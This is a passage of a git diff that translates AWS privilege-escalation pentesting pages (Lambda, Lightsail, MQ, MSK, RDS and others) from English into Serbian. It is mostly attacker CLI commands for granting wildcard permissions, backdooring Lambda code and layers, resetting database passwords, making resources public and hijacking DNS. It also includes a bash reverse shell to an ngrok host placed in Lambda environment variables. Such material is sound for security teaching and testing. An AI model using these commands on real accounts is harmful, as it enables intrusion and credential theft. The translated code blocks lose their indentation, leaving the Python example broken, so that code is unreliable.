-Now it's posible **connect the Lambda function to the DynamoDB table** by **creating an event source mapping**:
-
+Sada je moguće **povezati Lambda funkciju sa DynamoDB tabelom** tako što ćete **napraviti mapiranje izvora događaja**:
 ```bash
 aws lambda create-event-source-mapping --function-name my_function \
-    --event-source-arn  \
-    --enabled --starting-position LATEST
+--event-source-arn  \
+--enabled --starting-position LATEST
 ```
-
-With the Lambda function linked to the DynamoDB stream, the attacker can **indirectly trigger the Lambda by activating the DynamoDB stream**. This can be accomplished by **inserting an item** into the DynamoDB table:
-
+Sa Lambda funkcijom povezanošću sa DynamoDB strimom, napadač može **indirektno aktivirati Lambda funkciju aktiviranjem DynamoDB strima**. To se može postići **ubacivanjem stavke** u DynamoDB tabelu:
 ```bash
 aws dynamodb put-item --table-name my_table \
-    --item Test={S="Random string"}
+--item Test={S="Random string"}
 ```
-
-**Potential Impact:** Direct privesc to the lambda service role specified.
+**Potencijalni uticaj:** Direktno privesc na ulogu lambda servisa koja je navedena.
 
 ### `lambda:AddPermission`
 
-An attacker with this permission can **grant himself (or others) any permissions** (this generates resource based policies to grant access to the resource):
-
+Napadač sa ovom dozvolom može **dodeliti sebi (ili drugima) bilo kakve dozvole** (ovo generiše politike zasnovane na resursima za dodeljivanje pristupa resursu):
 ```bash
 # Give yourself all permissions (you could specify granular such as lambda:InvokeFunction or lambda:UpdateFunctionCode)
 aws lambda add-permission --function-name  --statement-id asdasd --action '*' --principal arn:
@@ -147,71 +130,62 @@ aws lambda add-permission --function-name  --statement-id asdasd --ac
 # Invoke the function
 aws lambda invoke --function-name  /tmp/outout
 ```
-
-**Potential Impact:** Direct privesc to the lambda service role used by granting permission to modify the code and run it.
+**Potencijalni uticaj:** Direktno privesc na lambda servisnu ulogu korišćenjem dozvole za modifikaciju koda i njegovo pokretanje.
 
 ### `lambda:AddLayerVersionPermission`
 
-An attacker with this permission can **grant himself (or others) the permission `lambda:GetLayerVersion`**. He could access the layer and search for vulnerabilities or sensitive information
-
+Napadač sa ovom dozvolom može **dati sebi (ili drugima) dozvolu `lambda:GetLayerVersion`**. Mogao bi pristupiti sloju i tražiti ranjivosti ili osetljive informacije.
 ```bash
 # Give everyone the permission lambda:GetLayerVersion
 aws lambda add-layer-version-permission --layer-name ExternalBackdoor --statement-id xaccount --version-number 1 --principal '*' --action lambda:GetLayerVersion
 ```
-
-**Potential Impact:** Potential access to sensitive information.
+**Potencijalni uticaj:** Potencijalni pristup osetljivim informacijama.
 
 ### `lambda:UpdateFunctionCode`
 
-Users holding the **`lambda:UpdateFunctionCode`** permission has the potential to **modify the code of an existing Lambda function that is linked to an IAM role.**\
-The attacker can **modify the code of the lambda to exfiltrate the IAM credentials**.
-
-Although the attacker might not have the direct ability to invoke the function, if the Lambda function is pre-existing and operational, it's probable that it will be triggered through existing workflows or events, thus indirectly facilitating the execution of the modified code.
+Korisnici koji imaju **`lambda:UpdateFunctionCode`** dozvolu imaju potencijal da **modifikuju kod postojeće Lambda funkcije koja je povezana sa IAM rolom.**\
+Napadač može **modifikovati kod lambda funkcije da bi eksfiltrirao IAM akreditive**.
 
+Iako napadač možda nema direktnu sposobnost da pozove funkciju, ako je Lambda funkcija već postojala i operativna, verovatno će biti pokrenuta kroz postojeće radne tokove ili događaje, čime se indirektno olakšava izvršenje modifikovanog koda.
 ```bash
 # The zip should contain the lambda code (trick: Download the current one and add your code there)
 aws lambda update-function-code --function-name target_function \
-    --zip-file fileb:///my/lambda/code/zipped.zip
+--zip-file fileb:///my/lambda/code/zipped.zip
 
 # If you have invoke permissions:
 aws lambda invoke --function-name my_function output.txt
 
 # If not check if it's exposed in any URL or via an API gateway you could access
 ```
-
-**Potential Impact:** Direct privesc to the lambda service role used.
+**Potencijalni uticaj:** Direktno privesc na ulogu lambda servisa koja se koristi.
 
 ### `lambda:UpdateFunctionConfiguration`
 
-#### RCE via env variables
-
-With this permissions it's possible to add environment variables that will cause the Lambda to execute arbitrary code. For example in python it's possible to abuse the environment variables `PYTHONWARNING` and `BROWSER` to make a python process execute arbitrary commands:
+#### RCE putem env varijabli
 
+Sa ovim dozvolama je moguće dodati varijable okruženja koje će uzrokovati da Lambda izvrši proizvoljan kod. Na primer, u python-u je moguće zloupotrebiti varijable okruženja `PYTHONWARNING` i `BROWSER` da bi se python proces izvršio proizvoljne komande:
 ```bash
 aws --profile none-priv lambda update-function-configuration --function-name  --environment "Variables={PYTHONWARNINGS=all:0:antigravity.x:0:0,BROWSER=\"/bin/bash -c 'bash -i >& /dev/tcp/2.tcp.eu.ngrok.io/18755 0>&1' & #%s\"}"
 ```
-
-For other scripting languages there are other env variables you can use. For more info check the subsections of scripting languages in:
+Za druge skriptne jezike postoje druge env promenljive koje možete koristiti. Za više informacija proverite podsekcije skriptnih jezika u:
 
 {{#ref}}
 https://book.hacktricks.xyz/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse
 {{#endref}}
 
-#### RCE via Lambda Layers
+#### RCE putem Lambda Layers
 
-[**Lambda Layers**](https://docs.aws.amazon.com/lambda/latest/dg/configuration-layers.html) allows to include **code** in your lamdba function but **storing it separately**, so the function code can stay small and **several functions can share code**.
-
-Inside lambda you can check the paths from where python code is loaded with a function like the following:
+[**Lambda Layers**](https://docs.aws.amazon.com/lambda/latest/dg/configuration-layers.html) omogućava uključivanje **koda** u vašu lambda funkciju, ali **da se čuva odvojeno**, tako da kod funkcije može ostati mali i **više funkcija može deliti kod**.
 
+Unutar lambda možete proveriti putanje sa kojih se python kod učitava pomoću funkcije kao što je sledeća:
 ```python
 import json
 import sys
 
 def lambda_handler(event, context):
-    print(json.dumps(sys.path, indent=2))
+print(json.dumps(sys.path, indent=2))
 ```
-
-These are the places:
+Ovo su mesta:
 
 1. /var/task
 2. /opt/python/lib/python3.7/site-packages
@@ -224,73 +198,61 @@ These are the places:
 9. /opt/python/lib/python3.7/site-packages
 10. /opt/python
 
-For example, the library boto3 is loaded from `/var/runtime/boto3` (4th position).
+Na primer, biblioteka boto3 se učitava iz `/var/runtime/boto3` (4. pozicija).
 
-#### Exploitation
+#### Eksploatacija
 
-It's possible to abuse the permission `lambda:UpdateFunctionConfiguration` to **add a new layer** to a lambda function. To execute arbitrary code this layer need to contain some **library that the lambda is going to import.** If you can read the code of the lambda, you could find this easily, also note that it might be possible that the lambda is **already using a layer** and you could **download** the layer and **add your code** in there.
-
-For example, lets suppose that the lambda is using the library boto3, this will create a local layer with the last version of the library:
+Moguće je zloupotrebiti dozvolu `lambda:UpdateFunctionConfiguration` da **dodate novi sloj** funkciji lambda. Da biste izvršili proizvoljan kod, ovaj sloj treba da sadrži neku **biblioteku koju će lambda uvesti.** Ako možete da pročitate kod lambda, mogli biste to lako da pronađete, takođe imajte na umu da može biti moguće da lambda **već koristi sloj** i da možete **preuzeti** sloj i **dodati svoj kod** unutra.
 
+Na primer, pretpostavimo da lambda koristi biblioteku boto3, ovo će kreirati lokalni sloj sa poslednjom verzijom biblioteke:
 ```bash
 pip3 install -t ./lambda_layer boto3
 ```
+Možete otvoriti `./lambda_layer/boto3/__init__.py` i **dodati backdoor u globalni kod** (funkciju za eksfiltraciju kredencijala ili dobijanje reverzibilne ljuske, na primer).
 
-You can open `./lambda_layer/boto3/__init__.py` and **add the backdoor in the global code** (a function to exfiltrate credentials or get a reverse shell for example).
-
-Then, zip that `./lambda_layer` directory and **upload the new lambda layer** in your own account (or in the victims one, but you might not have permissions for this).\
-Note that you need to create a python folder and put the libraries in there to override /opt/python/boto3. Also, the layer needs to be **compatible with the python version** used by the lambda and if you upload it to your account, it needs to be in the **same region:**
-
+Zatim, zipujte taj `./lambda_layer` direktorijum i **otpremite novi lambda sloj** na svoj račun (ili na račun žrtve, ali možda nemate dozvole za to).\
+Napomena: potrebno je da kreirate python folder i stavite biblioteke unutra da biste prepisali /opt/python/boto3. Takođe, sloj mora biti **kompatibilan sa verzijom pythona** koja se koristi u lambdi i ako ga otpremite na svoj račun, mora biti u **istoј regiji:**
 ```bash
 aws lambda publish-layer-version --layer-name "boto3" --zip-file file://backdoor.zip --compatible-architectures "x86_64" "arm64" --compatible-runtimes "python3.9" "python3.8" "python3.7" "python3.6"
 ```
-
-Now, make the uploaded lambda layer **accessible by any account**:
-
+Sada, učinite učitanu lambda sloj **pristupačnim za bilo koji nalog**:
 ```bash
 aws lambda add-layer-version-permission --layer-name boto3 \
-    --version-number 1 --statement-id public \
-    --action lambda:GetLayerVersion --principal *
+--version-number 1 --statement-id public \
+--action lambda:GetLayerVersion --principal *
 ```
-
-And attach the lambda layer to the victim lambda function:
-
+I prikačite lambda sloj na funkciju žrtve:
 ```bash
 aws lambda update-function-configuration \
-    --function-name  \
-    --layers arn:aws:lambda:::layer:boto3:1 \
-    --timeout 300 #5min for rev shells
+--function-name  \
+--layers arn:aws:lambda:::layer:boto3:1 \
+--timeout 300 #5min for rev shells
 ```
+Sledeći korak bi bio ili da **pozovemo funkciju** sami ako možemo ili da čekamo da **bude pozvana** normalnim sredstvima – što je sigurnija metoda.
 
-The next step would be to either **invoke the function** ourselves if we can or to wait until i**t gets invoked** by normal means–which is the safer method.
-
-A **more stealth way to exploit this vulnerability** can be found in:
+**Skriveniji način za iskorišćavanje ove ranjivosti** može se naći u:
 
 {{#ref}}
 ../aws-persistence/aws-lambda-persistence/aws-lambda-layers-persistence.md
 {{#endref}}
 
-**Potential Impact:** Direct privesc to the lambda service role used.
+**Potencijalni uticaj:** Direktno privesc na lambda servisnu ulogu koja se koristi.
 
 ### `iam:PassRole`, `lambda:CreateFunction`, `lambda:CreateFunctionUrlConfig`, `lambda:InvokeFunctionUrl`
 
-Maybe with those permissions you are able to create a function and execute it calling the URL... but I could find a way to test it, so let me know if you do!
+Možda sa tim dozvolama možete da kreirate funkciju i izvršite je pozivajući URL... ali nisam mogao da pronađem način da to testiram, pa mi javite ako vi uspete!
 
 ### Lambda MitM
 
-Some lambdas are going to be **receiving sensitive info from the users in parameters.** If get RCE in one of them, you can exfiltrate the info other users are sending to it, check it in:
+Neki lambdas će **primati osetljive informacije od korisnika u parametrima.** Ako dobijete RCE u jednom od njih, možete exfiltrirati informacije koje drugi korisnici šalju, proverite to u:
 
 {{#ref}}
 ../aws-post-exploitation/aws-lambda-post-exploitation/aws-warm-lambda-persistence.md
 {{#endref}}
 
-## References
+## Reference
 
 - [https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/](https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/)
 - [https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation-part-2/](https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation-part-2/)
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-lightsail-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-lightsail-privesc.md
index 1bf78eb3c..e4d013265 100644
--- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-lightsail-privesc.md
+++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-lightsail-privesc.md
@@ -4,112 +4,93 @@
 
 ## Lightsail
 
-For more information about Lightsail check:
+Za više informacija o Lightsail-u pogledajte:
 
 {{#ref}}
 ../aws-services/aws-lightsail-enum.md
 {{#endref}}
 
 > [!WARNING]
-> It’s important to note that Lightsail **doesn’t use IAM roles belonging to the user** but to an AWS managed account, so you can’t abuse this service to privesc. However, **sensitive data** such as code, API keys and database info could be found in this service.
+> Važno je napomenuti da Lightsail **ne koristi IAM uloge koje pripadaju korisniku** već AWS upravljanom nalogu, tako da ne možete zloupotrebiti ovu uslugu za privesc. Međutim, **osetljivi podaci** kao što su kod, API ključevi i informacije o bazi podataka mogli bi se naći u ovoj usluzi.
 
 ### `lightsail:DownloadDefaultKeyPair`
 
-This permission will allow you to get the SSH keys to access the instances:
-
+Ova dozvola će vam omogućiti da dobijete SSH ključeve za pristup instancama:
 ```
 aws lightsail download-default-key-pair
 ```
-
-**Potential Impact:** Find sensitive info inside the instances.
+**Potencijalni uticaj:** Pronaći osetljive informacije unutar instanci.
 
 ### `lightsail:GetInstanceAccessDetails`
 
-This permission will allow you to generate SSH keys to access the instances:
-
+Ova dozvola će vam omogućiti da generišete SSH ključeve za pristup instancama:
 ```bash
 aws lightsail get-instance-access-details --instance-name 
 ```
-
-**Potential Impact:** Find sensitive info inside the instances.
+**Potencijalni uticaj:** Pronaći osetljive informacije unutar instanci.
 
 ### `lightsail:CreateBucketAccessKey`
 
-This permission will allow you to get a key to access the bucket:
-
+Ova dozvola će vam omogućiti da dobijete ključ za pristup bucket-u:
 ```bash
 aws lightsail create-bucket-access-key --bucket-name 
 ```
-
-**Potential Impact:** Find sensitive info inside the bucket.
+**Potencijalni uticaj:** Pronađite osetljive informacije unutar kante.
 
 ### `lightsail:GetRelationalDatabaseMasterUserPassword`
 
-This permission will allow you to get the credentials to access the database:
-
+Ova dozvola će vam omogućiti da dobijete akreditive za pristup bazi podataka:
 ```bash
 aws lightsail get-relational-database-master-user-password --relational-database-name 
 ```
-
-**Potential Impact:** Find sensitive info inside the database.
+**Potencijalni uticaj:** Pronaći osetljive informacije unutar baze podataka.
 
 ### `lightsail:UpdateRelationalDatabase`
 
-This permission will allow you to change the password to access the database:
-
+Ova dozvola će vam omogućiti da promenite lozinku za pristup bazi podataka:
 ```bash
 aws lightsail update-relational-database --relational-database-name  --master-user-password 
 ```
-
-If the database isn't public, you could also make it public with this permissions with
-
+Ako baza podataka nije javna, možete je takođe učiniti javnom sa ovim dozvolama sa
 ```bash
 aws lightsail update-relational-database --relational-database-name  --publicly-accessible
 ```
-
-**Potential Impact:** Find sensitive info inside the database.
+**Potencijalni uticaj:** Pronaći osetljive informacije unutar baze podataka.
 
 ### `lightsail:OpenInstancePublicPorts`
 
-This permission allow to open ports to the Internet
-
+Ova dozvola omogućava otvaranje portova za Internet.
 ```bash
 aws lightsail open-instance-public-ports \
-    --instance-name MEAN-2 \
-    --port-info fromPort=22,protocol=TCP,toPort=22
+--instance-name MEAN-2 \
+--port-info fromPort=22,protocol=TCP,toPort=22
 ```
-
-**Potential Impact:** Access sensitive ports.
+**Potencijalni uticaj:** Pristup osetljivim portovima.
 
 ### `lightsail:PutInstancePublicPorts`
 
-This permission allow to open ports to the Internet. Note taht the call will close any port opened not specified on it.
-
+Ova dozvola omogućava otvaranje portova za Internet. Imajte na umu da će poziv zatvoriti bilo koji port koji nije naveden.
 ```bash
 aws lightsail put-instance-public-ports \
-    --instance-name MEAN-2 \
-    --port-infos fromPort=22,protocol=TCP,toPort=22
+--instance-name MEAN-2 \
+--port-infos fromPort=22,protocol=TCP,toPort=22
 ```
-
-**Potential Impact:** Access sensitive ports.
+**Potencijalni uticaj:** Pristup osetljivim portovima.
 
 ### `lightsail:SetResourceAccessForBucket`
 
-This permissions allows to give an instances access to a bucket without any extra credentials
-
+Ova dozvola omogućava dodeljivanje pristupa instancama za bucket bez dodatnih akreditiva.
 ```bash
 aws set-resource-access-for-bucket \
-    --resource-name  \
-    --bucket-name  \
-    --access allow
+--resource-name  \
+--bucket-name  \
+--access allow
 ```
-
-**Potential Impact:** Potential new access to buckets with sensitive information.
+**Potencijalni Uticaj:** Potencijalni novi pristup kanticama sa osetljivim informacijama.
 
 ### `lightsail:UpdateBucket`
 
-With this permission an attacker could grant his own AWS account read access over buckets or even make the buckets public to everyone:
-
+Sa ovom dozvolom, napadač bi mogao da dodeli svoj AWS nalog pristup za čitanje kanticama ili čak da učini kante javnim za sve:
 ```bash
 # Grant read access to exterenal account
 aws update-bucket --bucket-name  --readonly-access-accounts 
@@ -120,47 +101,36 @@ aws update-bucket --bucket-name  --access-rules getObject=public,allowPub
 # Bucket private but single objects can be public
 aws update-bucket --bucket-name  --access-rules getObject=private,allowPublicOverrides=true
 ```
-
-**Potential Impact:** Potential new access to buckets with sensitive information.
+**Potencijalni uticaj:** Potencijalni novi pristup kanticama sa osetljivim informacijama.
 
 ### `lightsail:UpdateContainerService`
 
-With this permissions an attacker could grant access to private ECRs from the containers service
-
+Sa ovom dozvolom, napadač bi mogao da omogući pristup privatnim ECR-ima iz servisa kontejnera.
 ```bash
 aws update-container-service \
-    --service-name  \
-    --private-registry-access ecrImagePullerRole={isActive=boolean}
+--service-name  \
+--private-registry-access ecrImagePullerRole={isActive=boolean}
 ```
-
-**Potential Impact:** Get sensitive information from private ECR
+**Potencijalni Uticaj:** Dobijanje osetljivih informacija iz privatnog ECR
 
 ### `lightsail:CreateDomainEntry`
 
-An attacker with this permission could create subdomain and point it to his own IP address (subdomain takeover), or craft a SPF record that allows him so spoof emails from the domain, or even set the main domain his own IP address.
-
+Napadač sa ovom dozvolom mogao bi da kreira poddomen i usmeri ga na svoju IP adresu (preuzimanje poddomena), ili da napravi SPF zapis koji mu omogućava da lažira e-poštu sa domena, ili čak da postavi glavni domen na svoju IP adresu.
 ```bash
 aws lightsail create-domain-entry \
-    --domain-name example.com \
-    --domain-entry name=dev.example.com,type=A,target=192.0.2.0
+--domain-name example.com \
+--domain-entry name=dev.example.com,type=A,target=192.0.2.0
 ```
-
-**Potential Impact:** Takeover a domain
+**Potencijalni uticaj:** Preuzimanje domena
 
 ### `lightsail:UpdateDomainEntry`
 
-An attacker with this permission could create subdomain and point it to his own IP address (subdomain takeover), or craft a SPF record that allows him so spoof emails from the domain, or even set the main domain his own IP address.
-
+Napadač sa ovom dozvolom mogao bi da kreira poddomen i usmeri ga na svoju IP adresu (preuzimanje poddomena), ili da napravi SPF zapis koji mu omogućava da lažira emailove sa domena, ili čak da postavi glavni domen na svoju IP adresu.
 ```bash
 aws lightsail update-domain-entry \
-    --domain-name example.com \
-    --domain-entry name=dev.example.com,type=A,target=192.0.2.0
+--domain-name example.com \
+--domain-entry name=dev.example.com,type=A,target=192.0.2.0
 ```
-
-**Potential Impact:** Takeover a domain
+**Potencijalni Uticaj:** Preuzimanje domena
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-mediapackage-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-mediapackage-privesc.md
index a1004bde6..4b208f0eb 100644
--- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-mediapackage-privesc.md
+++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-mediapackage-privesc.md
@@ -4,26 +4,18 @@
 
 ### `mediapackage:RotateChannelCredentials`
 
-Changes the Channel's first IngestEndpoint's username and password. (This API is deprecated for RotateIngestEndpointCredentials)
-
+Menja korisničko ime i lozinku prvog IngestEndpoint-a kanala. (Ova API je zastarela za RotateIngestEndpointCredentials)
 ```bash
 aws mediapackage rotate-channel-credentials --id 
 ```
-
 ### `mediapackage:RotateIngestEndpointCredentials`
 
-Changes the Channel's first IngestEndpoint's username and password. (This API is deprecated for RotateIngestEndpointCredentials)
-
+Menja korisničko ime i lozinku prvog IngestEndpoint-a kanala. (Ovaj API je zastareo za RotateIngestEndpointCredentials)
 ```bash
 aws mediapackage rotate-ingest-endpoint-credentials --id test --ingest-endpoint-id 584797f1740548c389a273585dd22a63
 ```
-
 ## References
 
 - [https://gist.github.com/kmcquade/33860a617e651104d243c324ddf7992a](https://gist.github.com/kmcquade/33860a617e651104d243c324ddf7992a)
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-mq-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-mq-privesc.md
index 80890e389..fb593b4d9 100644
--- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-mq-privesc.md
+++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-mq-privesc.md
@@ -4,7 +4,7 @@
 
 ## MQ
 
-For more information about MQ check:
+Za više informacija o MQ, pogledajte:
 
 {{#ref}}
 ../aws-services/aws-mq-enum.md
@@ -12,42 +12,32 @@ For more information about MQ check:
 
 ### `mq:ListBrokers`, `mq:CreateUser`
 
-With those permissions you can **create a new user in an ActimeMQ broker** (this doesn't work in RabbitMQ):
-
+Sa tim dozvolama možete **napraviti novog korisnika u ActimeMQ brokeru** (ovo ne funkcioniše u RabbitMQ):
 ```bash
 aws mq list-brokers
 aws mq create-user --broker-id  --console-access --password  --username 
 ```
-
-**Potential Impact:** Access sensitive info navigating through ActiveMQ
+**Potencijalni uticaj:** Pristup osetljivim informacijama navigacijom kroz ActiveMQ
 
 ### `mq:ListBrokers`, `mq:ListUsers`, `mq:UpdateUser`
 
-With those permissions you can **create a new user in an ActimeMQ broker** (this doesn't work in RabbitMQ):
-
+Sa tim dozvolama možete **napraviti novog korisnika u ActiveMQ brokeru** (ovo ne funkcioniše u RabbitMQ):
 ```bash
 aws mq list-brokers
 aws mq list-users --broker-id 
 aws mq update-user --broker-id  --console-access --password  --username 
 ```
-
-**Potential Impact:** Access sensitive info navigating through ActiveMQ
+**Potencijalni uticaj:** Pristup osetljivim informacijama navigirajući kroz ActiveMQ
 
 ### `mq:ListBrokers`, `mq:UpdateBroker`
 
-If a broker is using **LDAP** for authorization with **ActiveMQ**. It's possible to **change** the **configuration** of the LDAP server used to **one controlled by the attacker**. This way the attacker will be able to **steal all the credentials being sent through LDAP**.
-
+Ako broker koristi **LDAP** za autorizaciju sa **ActiveMQ**. Moguće je **promeniti** **konfiguraciju** LDAP servera koji se koristi na **onaj koji kontroliše napadač**. Na ovaj način napadač će moći da **ukrade sve kredencijale koji se šalju putem LDAP**.
 ```bash
 aws mq list-brokers
 aws mq update-broker --broker-id  --ldap-server-metadata=...
 ```
+Ako biste nekako mogli pronaći originalne akreditive korišćene od strane ActiveMQ, mogli biste izvesti MitM, ukrasti akreditive, koristiti ih na originalnom serveru i poslati odgovor (možda samo ponovnim korišćenjem ukradenih akreditiva mogli biste to uraditi).
 
-If you could somehow find the original credentials used by ActiveMQ you could perform a MitM, steal the creds, used them in the original server, and send the response (maybe just reusing the crendetials stolen you could do this).
-
-**Potential Impact:** Steal ActiveMQ credentials
+**Potencijalni uticaj:** Ukrasti ActiveMQ akreditive
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-msk-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-msk-privesc.md
index f0538785f..c3f883d19 100644
--- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-msk-privesc.md
+++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-msk-privesc.md
@@ -4,7 +4,7 @@
 
 ## MSK
 
-For more information about MSK (Kafka) check:
+Za više informacija o MSK (Kafka) pogledajte:
 
 {{#ref}}
 ../aws-services/aws-msk-enum.md
@@ -12,17 +12,11 @@ For more information about MSK (Kafka) check:
 
 ### `msk:ListClusters`, `msk:UpdateSecurity`
 
-With these **privileges** and **access to the VPC where the kafka brokers are**, you could add the **None authentication** to access them.
-
+Sa ovim **privilegijama** i **pristupom VPC-u gde se nalaze kafka brokeri**, mogli biste dodati **None authentication** za pristup njima.
 ```bash
 aws msk --client-authentication  --cluster-arn  --current-version 
 ```
-
-You need access to the VPC because **you cannot enable None authentication with Kafka publicly** exposed. If it's publicly exposed, if **SASL/SCRAM** authentication is used, you could **read the secret** to access (you will need additional privileges to read the secret).\
-If **IAM role-based authentication** is used and **kafka is publicly exposed** you could still abuse these privileges to give you permissions to access it.
+Morate imati pristup VPC-u jer **ne možete omogućiti None autentifikaciju sa Kafka javno** izloženim. Ako je javno izložen, ako se koristi **SASL/SCRAM** autentifikacija, mogli biste **pročitati tajnu** za pristup (biće vam potrebne dodatne privilegije da pročitate tajnu).\
+Ako se koristi **IAM uloga zasnovana autentifikacija** i **kafka je javno izložena**, i dalje biste mogli zloupotrebiti te privilegije da dobijete dozvole za pristup. 
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-organizations-prinvesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-organizations-prinvesc.md
index 7d43bbd3b..1ed8ae804 100644
--- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-organizations-prinvesc.md
+++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-organizations-prinvesc.md
@@ -2,21 +2,17 @@
 
 {{#include ../../../banners/hacktricks-training.md}}
 
-## Organizations
+## Organizacije
 
-For more information check:
+Za više informacija pogledajte:
 
 {{#ref}}
 ../aws-services/aws-organizations-enum.md
 {{#endref}}
 
-## From management Account to children accounts
+## Od upravljačkog naloga do naloga dece
 
-If you compromise the root/management account, chances are you can compromise all the children accounts.\
-To [**learn how check this page**](../#compromising-the-organization).
+Ako kompromitujete root/upravljački nalog, šanse su da možete kompromitovati sve naloge dece.\
+Da [**naučite kako, proverite ovu stranicu**](../#compromising-the-organization).
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-rds-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-rds-privesc.md
index b4a08093e..d531ab9fd 100644
--- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-rds-privesc.md
+++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-rds-privesc.md
@@ -4,7 +4,7 @@
 
 ## RDS - Relational Database Service
 
-For more information about RDS check:
+Za više informacija o RDS pogledajte:
 
 {{#ref}}
 ../aws-services/aws-relational-database-rds-enum.md
@@ -12,59 +12,54 @@ For more information about RDS check:
 
 ### `rds:ModifyDBInstance`
 
-With that permission an attacker can **modify the password of the master user**, and the login inside the database:
-
+Sa tom dozvolom napadač može **promeniti lozinku glavnog korisnika**, i prijavu unutar baze podataka:
 ```bash
 # Get the DB username, db name and address
 aws rds describe-db-instances
 
 # Modify the password and wait a couple of minutes
 aws rds modify-db-instance \
-    --db-instance-identifier  \
-    --master-user-password 'Llaody2f6.123' \
-    --apply-immediately
+--db-instance-identifier  \
+--master-user-password 'Llaody2f6.123' \
+--apply-immediately
 
 # In case of postgres
 psql postgresql://:@:5432/
 ```
-
 > [!WARNING]
-> You will need to be able to **contact to the database** (they are usually only accessible from inside networks).
+> Moraćete da budete u mogućnosti da **kontaktirate bazu podataka** (obično su dostupne samo iz unutrašnjih mreža).
 
-**Potential Impact:** Find sensitive info inside the databases.
+**Potencijalni uticaj:** Pronaći osetljive informacije unutar baza podataka.
 
 ### rds-db:connect
 
-According to the [**docs**](https://docs.aws.amazon.com/AmazonRDS/latest/UserGuide/UsingWithRDS.IAMDBAuth.IAMPolicy.html) a user with this permission could connect to the DB instance.
+Prema [**dokumentaciji**](https://docs.aws.amazon.com/AmazonRDS/latest/UserGuide/UsingWithRDS.IAMDBAuth.IAMPolicy.html), korisnik sa ovom dozvolom može da se poveže na DB instancu.
 
-### Abuse RDS Role IAM permissions
+### Zloupotreba RDS Role IAM dozvola
 
 #### Postgresql (Aurora)
 
 > [!TIP]
-> If running **`SELECT datname FROM pg_database;`** you find a database called **`rdsadmin`** you know you are inside an **AWS postgresql database**.
-
-First you can check if this database has been used to access any other AWS service. You could check this looking at the installed extensions:
+> Ako pokrenete **`SELECT datname FROM pg_database;`** i pronađete bazu podataka pod nazivom **`rdsadmin`**, znate da ste unutar **AWS postgresql baze podataka**.
 
+Prvo možete proveriti da li je ova baza podataka korišćena za pristup bilo kojoj drugoj AWS usluzi. Možete to proveriti gledajući instalirane ekstenzije:
 ```sql
 SELECT * FROM pg_extension;
 ```
+Ako pronađete nešto poput **`aws_s3`**, možete pretpostaviti da ova baza podataka ima **neku vrstu pristupa S3** (postoje i druge ekstenzije kao što su **`aws_ml`** i **`aws_lambda`**).
 
-If you find something like **`aws_s3`** you can assume this database has **some kind of access over S3** (there are other extensions such as **`aws_ml`** and **`aws_lambda`**).
-
-Also, if you have permissions to run **`aws rds describe-db-clusters`** you can see there if the **cluster has any IAM Role attached** in the field **`AssociatedRoles`**. If any, you can assume that the database was **prepared to access other AWS services**. Based on the **name of the role** (or if you can get the **permissions** of the role) you could **guess** what extra access the database has.
-
-Now, to **read a file inside a bucket** you need to know the full path. You can read it with:
+Takođe, ako imate dozvole da pokrenete **`aws rds describe-db-clusters`**, možete videti da li **klaster ima neku IAM ulogu prikačenu** u polju **`AssociatedRoles`**. Ako ima, možete pretpostaviti da je baza podataka **pripremljena za pristup drugim AWS uslugama**. Na osnovu **imena uloge** (ili ako možete dobiti **dozvole** uloge) mogli biste **pretpostaviti** koji dodatni pristup baza podataka ima.
 
+Sada, da biste **pročitali datoteku unutar kante**, morate znati punu putanju. Možete je pročitati sa:
 ```sql
 // Create table
 CREATE TABLE ttemp (col TEXT);
 
 // Create s3 uri
 SELECT aws_commons.create_s3_uri(
-   'test1234567890678', // Name of the bucket
-   'data.csv',          // Name of the file
-   'eu-west-1'          //region of the bucket
+'test1234567890678', // Name of the bucket
+'data.csv',          // Name of the file
+'eu-west-1'          //region of the bucket
 ) AS s3_uri \gset
 
 // Load file contents in table
@@ -76,98 +71,81 @@ SELECT * from ttemp;
 // Delete table
 DROP TABLE ttemp;
 ```
-
-If you had **raw AWS credentials** you could also use them to access S3 data with:
-
+Ako imate **sirove AWS akreditive**, takođe ih možete koristiti za pristup S3 podacima sa:
 ```sql
 SELECT aws_s3.table_import_from_s3(
-   't', '', '(format csv)',
-   :'s3_uri',
-   aws_commons.create_aws_credentials('sample_access_key', 'sample_secret_key', '')
+'t', '', '(format csv)',
+:'s3_uri',
+aws_commons.create_aws_credentials('sample_access_key', 'sample_secret_key', '')
 );
 ```
-
 > [!NOTE]
